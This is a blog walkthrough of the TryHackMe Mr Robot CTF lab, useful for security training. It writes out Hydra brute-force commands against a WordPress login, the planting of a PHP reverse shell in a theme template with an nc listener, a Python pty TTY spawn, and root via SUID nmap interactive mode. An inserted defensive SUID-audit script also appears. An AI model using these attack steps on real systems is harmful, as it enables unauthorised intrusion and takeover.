TryHackMe Walkthrough: Mr Robot CTF

Hunter Mason
5 min read · May 20, 2021

This TryHackMe room is a medium-difficulty CTF. The target is a WordPress site whose login we were able to brute force with Hydra. We then used the WordPress theme editor to upload a reverse shell. From there, we found an MD5 password hash, which we cracked with John the Ripper, and used the recovered password to switch to the robot user. Finally, we escalated to root by abusing the SUID bit set on nmap, which let us run nmap's interactive mode as root and spawn a shell from it.

https://tryhackme.com/room/mrrobot

As always, we begin with an nmap scan of the machine. The scan indicated that ports 22, 80, and 443 are open.

nmap -vv -A 10.10.52.69

nmap

Since this indicates a web server is hosted, I navigated to the site to look for more. Right away, I tried the /robots.txt path and found two entries:

robots.txt file

I navigated to /key-1-of-3.txt to obtain the first key:

Key 1 of 3 file on the server

From there, I took a look at the fsocity.dic file. Downloading it gave a file that appeared to be a list of usernames/passwords:

fsocity.dic file

I originally thought this would work for SSH into the machine, but that is closed. I did some more enumeration on the web server and discovered it was a WordPress site. I navigated to /wp-login.php to find the login page.

wp-login.php page

I tried the basic usernames and passwords before trying to brute force using the fsocity.dic file.

To begin, this application is vulnerable to username enumeration. I was able to use Hydra to brute force the username Elliot with the following Hydra command:

hydra -L ~/Downloads/fsocity.dic -p pass 10.10.52.69 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.52.69%2Fwp-admin%2F&testcookie=1:Invalid username."

This Hydra command used the fsocity list to brute force the username only. The password did not matter at this point; we just needed a valid username.

Hydra usernames output

This worked because the application returned a different response when a valid username was provided, as seen below:

Elliot username enumeration

From here, I focused on brute forcing the password for the Elliot user with Hydra. With a small adjustment to the command, Hydra brute forced the WordPress login using the username we had found, Elliot:

hydra -l Elliot -P ~/Downloads/fsocity.dic 10.10.52.69 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.52.69%2Fwp-admin%2F&testcookie=1:incorrect"

This resulted in a valid password of ER28-0652.

Hydra brute forced the password

Now that we have a valid username and password, we can log into the admin console of the WordPress site.

wp-admin page

Using the themes functionality, we can upload a PHP reverse shell.

First, we need to get our PHP reverse shell ready. In Kali, one can be found at /usr/share/webshells/php/php-reverse-shell.php. I copied this file to my Desktop so I could make the necessary changes.

I changed the reverse shell's target IP address to my own. I left the port as 1234 and will open the listener on that port.

php reverse shell changed

Next, I navigated to the theme editor in the WordPress admin panel. I decided to put my reverse shell in the 404.php page: I opened the 404 template and pasted the reverse shell in.

php reverse shell in the 404 template

Now, I started a listener on my machine with nc -nvlp 1234.

Navigate to the /404.php path and check your nc listener. We now have a shell as the daemon account.

reverse shell connected

After some digging, we found there is a user called robot and a key-2-of-3.txt file that we don't have permission to read. However, there is an MD5 hash of a password that we can read.

Password md5 hash

Using John the Ripper, we will crack this hash.

I took the raw MD5 hash and fed it into John using the fsocity.dic wordlist we found earlier.

sudo john --format=Raw-MD5 --wordlist=~/Downloads/fsocity.dic ~/Desktop/password.raw-md5

This gave us the password: abcdefghijklmnopqrstuvwxyz

When trying to switch to the robot user with su, we get an error that it must be run from a terminal. In this case, we can use Python to spawn a proper TTY with the following commands:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

This gave us the ability to use the su command and switch to the user robot. Now we can cat out the key-2-of-3.txt file!

key-2-of-3.txt

Next, we need to escalate our privileges to root in order to get the last key. Using the following command, we can check for any files with the SUID bit set. An executable with the SUID bit set runs with the permissions of the file's owner rather than those of the user who launched it.

find / -perm -4000 2>/dev/null

From this, we can see that nmap has the SUID bit set, which is unusual.

suid bit is set for nmap

On further investigation, we can see the nmap binary is owned by root, which means we can run nmap with root permissions.
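The find command above is the attacker's view; the same check, run on a schedule and compared against a baseline of binaries that are supposed to be SUID, is how a defender would have caught the root-owned nmap. As an added example (not part of the original post), this Python audit walks the filesystem for SUID files and reports any root-owned one that is not in an expected set; the expected set and the sample entries are constructed for illustration, not taken from the CTF machine.

```python
import os
import stat

# Illustrative baseline of binaries that are normally SUID on a stock Linux install.
# A real baseline should be generated from a known-good image of the same distro.
EXPECTED_SUID = {"passwd", "su", "sudo", "mount", "umount", "chsh", "chfn",
                 "gpasswd", "newgrp", "ping", "pkexec"}

def walk_suid(root="/"):
    """Yield (path, mode, uid) for every regular file under root with the SUID bit set.
    Equivalent to `find / -perm -4000`, but keeps owner and mode for classification."""
    for dirpath, _dirs, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)            # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st.st_mode, st.st_uid

def classify_suid(entries, expected=EXPECTED_SUID):
    """Annotate each SUID entry: is it root-owned, is it on the baseline, is it
    executable by everyone. Root-owned + unexpected + world-executable is the
    combination that gave the post its root shell."""
    findings = []
    for path, mode, uid in entries:
        if not mode & stat.S_ISUID:
            continue
        findings.append({
            "path": path,
            "root_owned": uid == 0,
            "expected": os.path.basename(path) in expected,
            "world_exec": bool(mode & stat.S_IXOTH),
        })
    return findings

def unexpected_root_suid(entries, expected=EXPECTED_SUID):
    """Paths of root-owned SUID binaries that are not on the baseline."""
    return [f["path"] for f in classify_suid(entries, expected)
            if f["root_owned"] and not f["expected"]]

# Constructed sample entries (path, st_mode, st_uid); 0o104755 = regular file, SUID, 755.
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", 0o104755, 0),      # expected SUID root
    ("/usr/local/bin/nmap", 0o104755, 0),  # unexpected SUID root: the finding
    ("/usr/bin/ls", 0o100755, 0),          # no SUID bit
    ("/home/robot/tool", 0o104755, 1002),  # SUID but not root-owned
]

if __name__ == "__main__":
    for p in unexpected_root_suid(SAMPLE_ENTRIES):   # swap in walk_suid() for a live host
        print("unexpected root-owned SUID binary:", p)
```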

We can use the following commands to open nmap in interactive mode, then spawn a shell from it.

nmap --interactive
!sh

Now we have root!

root via nmap interactive

With a little further digging, we can now cat key-3-of-3.txt.

key-3-of-3.txt

That’s all!
